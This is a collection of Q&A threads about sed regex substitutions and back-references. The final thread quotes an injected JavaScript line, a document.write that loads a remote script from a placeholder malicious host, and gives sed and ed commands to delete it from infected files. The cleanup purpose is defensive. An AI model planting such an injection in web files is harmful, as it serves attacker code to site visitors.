sed replace with unknown section in css - sed

I could use an assist with a sed search and replace.
In this situation the file is css and the section I want to replace is among other values being set in the css. The following works:
sed -i 's/PlayButton-playCircle-kffp_v{border:2px solid hsla(0,0%,100%,.7);border-radius:50%;color:hsla(0,0%,100%,.7);display:inline-block/PlayButton-playCircle-kffp_v{border:2px solid hsla(0,0%,100%,.7);border-radius:50%;color:hsla(0,0%,100%,.7);display:none/g' file.css
But in another file.css where I wish to do the same thing the values surrounding the 'display:inline-block' may be in a different order. So it would make more sense to use something like a '.*' like "PlayButton-playCircle-kffp_v{.*;display:inline-block".
The css file is generated automatically and is fixed once generated, but I can't be sure what order the attributes are in within the {}. I need to match the item with PlayButton-playCircle-...... that has the attribute display:inline-block and change it to display:none.
Updating with answer formed with information from both commenters:
sed -i 's/\(PlayButton-playCircle-......{[^}]*;\)display:inline-block/\1display:none/g' $maincss
Instead of .*, [^}]* is used to match in the same way as .* but not matching '}' if found. This ensures the match is kept to one level of depth within {}.
Thank you!

You can rewrite it a bit as follows.
sed -i 's/\(PlayButton-playCircle-kffp_v{.*\)display:inline-block/\1display:none/g' file.css
The text between \( and \) will be captured and can be referenced as \1 in the replacement string.
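One caveat with the .* in the command above: it is greedy, so on a minified stylesheet where several rules share one line it can run past the closing } into a later rule. The sketch below compares it with the bounded [^}]* form. Both stylesheet strings and the .Other-abc selector are made up for illustration.

```shell
# Made-up one-line stylesheet: the target rule has no display property,
# but a later, unrelated rule does.
css='.PlayButton-playCircle-kffp_v{border-radius:50%;color:red}.Other-abc{margin:0;display:inline-block}'

# Greedy .* crosses the closing brace and edits the unrelated rule.
greedy=$(printf '%s\n' "$css" | sed 's/\(PlayButton-playCircle-kffp_v{.*\)display:inline-block/\1display:none/')

# [^}]* cannot cross a closing brace, so nothing matches and the line is unchanged.
bounded=$(printf '%s\n' "$css" | sed 's/\(PlayButton-playCircle-kffp_v{[^}]*\)display:inline-block/\1display:none/')

# Second made-up line where the target rule does contain the property.
css2='.PlayButton-playCircle-kffp_v{color:red;display:inline-block;margin:0}'
fixed=$(printf '%s\n' "$css2" | sed 's/\(PlayButton-playCircle-kffp_v{[^}]*\)display:inline-block/\1display:none/')

printf '%s\n' "$greedy" "$bounded" "$fixed"
```

If every rule sits on its own line, the two forms behave the same; the difference only shows up when one line holds more than one {} block.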

Related

Add words at beginning and end of a FASTA header line with sed

I have the following line:
>XXX-220_5004_COVID-A6
TTTATTTGACATGAGTAAATTTCCCCTTAAATTAAGGGGTACTGCTGTTATGTCTTTAAA
AGAAGGTCAAATCAATGATATGATTTTATCTCTTCTTAGTAAAGGTAGACTTATAATTAG
AGAAAACAAC
I would like to convert the first line as follows:
>INITWORD/XXX-220_5004_COVID-A6/FINALWORD
TTTATTTGACATGAGTAAATTTCCCCTTAAATTAAGGGGTACTGCTGTTATGTCTTTAAA
AGAAGGT...
So far I have managed to add the first word as follows:
sed 's/>/>INITWORD\//I'
That returns:
>INITWORD/XXX-220_5004_COVID-A6
TTTATTTGACATGAGTAAATTTCCCCTTAAATTAAGGGGTACTGCTGTTATGTCTTTAAA
AGAAGGT
How can I add the FINALWORD at the end of the first line?
Just substitute more. sed conveniently allows you to recall the text you matched with a back reference, so just embed that between the things you want to add.
sed 's%^>\(.*\)%>INITWORD/\1/FINALWORD%I' file.fasta
I also added a ^ beginning-of-line anchor, and switched to % delimiters so the slashes don't need to be escaped.
In some more detail, the s command's syntax is s/regex/replacement/flags where regex is a regular expression to match the text you want to replace, and replacement is the text to replace it with. In the regex, you can use grouping parentheses \(...\) to extract some of the matched text into the replacement; so \1 refers to whatever matched the first set of grouping parentheses, \2 to the second, etc. The /flags are optional single-character specifiers which modify the behavior of the command; so for example, a /g flag says to replace every match on a line, instead of just the first one (but we only expect one match per line so it's not necessary or useful here).
The I flag is non-standard but since you are using that, I assume it does something useful for you.
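As a small sketch of the pieces described above (back references and the g flag), the following runs the substitution on a shortened copy of the record from the question, plus two made-up one-line inputs. The non-standard I flag is left out here so the commands stay portable.

```shell
# Sample record from the question, shortened to one partial sequence line.
fasta='>XXX-220_5004_COVID-A6
TTTATTTGACATGAGTAAATTTCCCC'

# \1 recalls the header text captured by \(.*\); only lines starting with > match.
tagged=$(printf '%s\n' "$fasta" | sed 's%^>\(.*\)%>INITWORD/\1/FINALWORD%')

# Two groups can be recalled in any order: swap the sides of key=value.
swapped=$(printf 'key=value\n' | sed 's/\(.*\)=\(.*\)/\2=\1/')

# Without g only the first match on a line is replaced; with g, every match.
first_only=$(printf 'a-b-c\n' | sed 's/-/_/')
every=$(printf 'a-b-c\n' | sed 's/-/_/g')

printf '%s\n' "$tagged" "$swapped" "$first_only" "$every"
```

The sequence line passes through untouched because the ^> anchor restricts the match to header lines.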

sed backreference not being found

I am trying to use 'sed' to replace a list of paths in a file with another path.
An example string to process is:
/path/to/file/block
I want to replace /path/to/file with something else.
I have tried:
sed -r '/\s(\S+)\/block/s/\1/new_path/'
I know it's finding the matching string but I'm getting an invalid back reference error.
How can I do this?
This may do:
echo "/path/to/file/block" | sed -r 's|/\S*/(block)|/newpath/\1|'
/newpath/block
Test
echo "test=/path/file test2=/path/to/file/block test3=/home/root/file" | sed -r 's|/\S*/(block)|/newpath/\1|'
test=/path/file test2=/newpath/block test3=/home/root/file
Back-references always refer to the pattern of the s command, not to any address (before the command).
However, in this case, there's no need for addressing: we can apply the substitution to all lines (and it will change only lines where it matches), so we can write:
s,\s\S+/block, new_path/block,
(I added a space to the RHS, as I'm guessing you didn't mean to overwrite that; also used a different separator to reduce the need for backslashes.)
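A minimal sketch of the substitution-only approach, assuming an input line where the path follows a space. Since \s and \S are GNU extensions, this version spells them as POSIX bracket classes; the sample line is made up.

```shell
# Made-up input line; the path is preceded by whitespace, as the question's \s implies.
line='src /path/to/file/block'

# Replace the whole path before /block; no back-reference is needed.
plain=$(printf '%s\n' "$line" | sed -E 's,[[:space:]][^[:space:]]+/block, new_path/block,')

# Same edit with a group inside the s pattern itself, so \1 is valid here.
grouped=$(printf '%s\n' "$line" | sed -E 's,[[:space:]][^[:space:]]+/(block), new_path/\1,')

printf '%s\n' "$plain" "$grouped"
```

Both commands give the same result; the second only shows that \1 works once the group lives in the s pattern rather than in the address.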

Changing a character in between patterns in vi/sed

I am struggling to work out how to get a , out from in between various patterns such as:
500,000
xyz ,CA
I have tried something like:
sed -E "s/\([a-zA-Z]*\),([a-zA-Z]*\)/\([a-zA-Z]*\) ([a-zA-Z]*\)/g" $file -i
It picks up the first pattern, but then overwrites it with the second pattern. I feel like I am missing something very simple and I can't work it out; any help is really appreciated.
You're missing the notion of capture groups, I think. To refer to a parenthesized portion of the search within the replacement string, use \1 for the first group, \2 for the second group, etc.
The modified line would be:
sed -E "s/([a-zA-Z]),([a-zA-Z])/\1 \2/g" $file -i
Rather than replacing the part that matches the first ([a-zA-Z]) with the literal text "([a-zA-Z])", this modified line just copies the matched portion into the output (and likewise for the second group).
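To see what the modified line does and does not touch, here is a short sketch run on made-up and sample inputs. The last command is an assumed variant, not part of the answer above: it allows one optional space before the comma, which the "xyz ,CA" sample seems to need.

```shell
# Letters on both sides of the comma: the groups are copied back around a space.
letters=$(printf 'ab,cd\n' | sed -E 's/([a-zA-Z]),([a-zA-Z])/\1 \2/g')

# Digits are not in [a-zA-Z], so a number keeps its comma.
number=$(printf '500,000\n' | sed -E 's/([a-zA-Z]),([a-zA-Z])/\1 \2/g')

# Assumed variant: allow one optional space before the comma, as in "xyz ,CA".
spaced=$(printf 'xyz ,CA\n' | sed -E 's/([a-zA-Z]) ?,([a-zA-Z])/\1 \2/g')

printf '%s\n' "$letters" "$number" "$spaced"
```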

What does the following sed statement mean

sed 's/<img src=\"\([^"]*\).*/\1/g'
input:
<img src="https://geo.yahoo.com/b?s=792600534"; height="1" width="1" style="position: absolute;" />
output:
https://geo.yahoo.com/b?s=792600534
The first part of the s command is the regular expression to match, with a capturing group later referred to as \1 (the first capturing group). It extracts the value of the src attribute.
First part of the regex -> <img src=\"
capturing group -> \([^"]*\)
rest of the regex -> .*
The expression inside the square brackets could be read as: "anything not a double quote".
sed is a scripting language. Its s command performs substitutions using regular expressions. The syntax is s/regex/replacement/flags. In your example, you have the regex
<img src=\"\([^"]*\).*
and the replacement
\1
and the flags
g
The regex is apparently attempting to parse HTML, which earns you a place in a warm location where a friendly gentleman with a pitchfork helps you with motivational issues. Far, far away, God reluctantly ends the life of a fluffy kitten.
The regular expression contains a capturing group, which is simply the text which matched between the parentheses. The replacement \1 refers back to this captured text. So in brief, you are taking away the parts which matched around this captured string.
s/foo\(bar\)baz/\1/
replaces foobarbaz with just bar, retrieving the "bar" part from whatever matched, rather than hard-coding a replacement string.
The regular expression .* matches any character any number of times; the regular expression engine will prefer the longest, leftmost possible match.
The regular expression [^"] matches a single character which is not (newline or) ", and the * again says to match as many times as possible. So "\([^"]*\)" finds a double-quoted string and captures its contents; the negated " prevents the regular expression from matching past the closing quote when matching as many characters as possible. (As noted in comments, the backslash before the first " is unnecessary, but basically harmless. It just tells us that whoever wrote this isn't a regex wizard.)
However, your example just implicitly includes the closing quote in the .* match which will simply match everything from the closing quote through to the end of the line.
The g flag says to repeat the substitution command as many times as possible; so if an input line contains multiple matches, all of them will be replaced. (Without the g flag, sed will just replace the first match it finds on a line.) But since you just removed the rest of the line, the flag isn't actually useful here; there can only ever be a single match.
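The roles of [^"]* and the trailing .* are easier to see side by side. This is only a sketch on a made-up tag (the example.com URL is a placeholder), with the unnecessary backslash before the first " dropped.

```shell
# Made-up tag; the URL is a placeholder.
html='<img src="http://example.com/a.png" height="1" width="1" />'

# As in the question: capture up to the closing quote, let .* swallow the rest.
url=$(printf '%s\n' "$html" | sed 's/<img src="\([^"]*\).*/\1/')

# Without the trailing .*, the unmatched tail of the line is left in place.
no_tail=$(printf '%s\n' "$html" | sed 's/<img src="\([^"]*\)/\1/')

# With a greedy .* inside the quotes, the capture runs to the last quote on the line.
greedy=$(printf '%s\n' "$html" | sed 's/<img src="\(.*\)".*/\1/')

printf '%s\n' "$url" "$no_tail" "$greedy"
```

Only the first form yields the bare URL; the other two leave attribute text behind, which is why the negated bracket expression and the trailing .* are both there.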
The gentleman with the pitchfork doesn't want me to tell you this, but this code is not suitable for a general-purpose script. There is no guarantee that the src attribute of the img element will be immediately adjacent to the img opening tag with just a single space in between; HTML allows arbitrary spacing (including a line wrap) and you can have other attributes like id or alt or title which could go before or after the src attribute. The proper solution is to use an HTML parser to extract the src attributes of img tags with proper understanding of the surrounding syntax.
xmlstarlet sel -T -t -m "/img" -m "@src" -v '.' -n
... though the stray semicolon after the src attribute is an HTML syntax violation; is it really there in your input?
(xmlstarlet command line shamelessly adapted from https://stackoverflow.com/a/3174307/874188)

How to delete multiple lines from text file, including matched line?

I found some malicious JavaScript inserted into dozens of files.
The malicious code looks like this:
/*123456*/
document.write('<script type="text/javascript" src="http://maliciousurl.com/asdf/KjdfL4ljd?id=9876543"></script>');
/*/123456*/
Some kind of opening tag, the document.write that inserts the remote script, a seemingly empty line, and then their "closing tag."
In a comment on this Stack Overflow answer I found out how to delete a single line in a single file.
sed -i '/pattern to match/d' ./infile
But I need to delete one line before, and two lines after, and again it is in at least a few dozen files.
So I think I could perhaps use grep -lr to find the file names, then pass each one to sed and somehow remove the matching line, as well as one before and 2 after (4 lines total). Pattern to match could be "\n*\nmaliciousurl\n\n*\n"?
I also tried this, trying to replace the pattern with empty string. The .* are the hex numbers in the opening/closing tags, and also the stuff between the tags.
sed -e '\%/\*.*\*/.*maliciousurl.*/\*/.*\*/%,\%%d' test.js
You need to match on the begin and end comments, not the document.write line:
sed -e '\%/\*123456\*/%,\%/\*/123456\*/%d'
This uses the % symbol in place of the more normal / to delimit the patterns, which is usually a good idea when the pattern contains slashes and doesn't contain % symbols. The leading \ tells sed that the following character is the pattern delimiter. You can use any character (except backslash or newline) in place of the %; Control-A is another good one to consider.
From the sed manual on Mac OS X:
In a context address, any character other than a backslash ('\') or newline character may be used to delimit the regular expression. Also, putting a backslash character before the delimiting character causes the character to be treated literally. For example, in the context address \xabc\xdefx, the RE delimiter is an 'x' and the second 'x' stands for itself, so that the regular expression is 'abcxdef'.
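Since the question mentions dozens of files, here is a rough sketch of how the range deletion could be combined with the grep -lr idea. The scratch directory, file names and file contents are all made up, it assumes file names without newlines, and -i.bak is used so each edited file keeps a backup copy.

```shell
# Hypothetical scratch directory with one infected and one clean file.
workdir=$(mktemp -d)
printf '%s\n' 'var a = 1;' '/*123456*/' 'document.write("x");' '' '/*/123456*/' 'var b = 2;' > "$workdir/infected.js"
printf '%s\n' 'var c = 3;' > "$workdir/clean.js"

# Collect the names of files containing the opening marker first (-F: fixed string),
# so the backups created below are not picked up while grep is still scanning.
grep -rlF '/*123456*/' "$workdir" > "$workdir.list"

# Delete everything from the opening marker through the closing marker in each file.
while IFS= read -r f; do
    sed -i.bak -e '\%/\*123456\*/%,\%/\*/123456\*/%d' "$f"
done < "$workdir.list"

cat "$workdir/infected.js"
```

Files that never matched are not rewritten at all, and the .bak copies can be removed once the result has been checked.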
Now, if in fact your pattern isn't as easily identified as the /*123456*/ you show in the example, then maybe you are forced to key off the malicious URL. However, in that case, you cannot use sed very easily; it cannot do relative offsets (/x/+1 is not allowed, let alone /x/-1). At that point, you probably fall back on ed (or perhaps ex):
ed - $file <<'EOF'
g/maliciousurl.com/.-1,.+2d
w
q
EOF
This does a global search for the malicious URL, and with each occurrence, deletes from the line before the current line (.-1) to two lines after it (.+2). Then write the file and quit.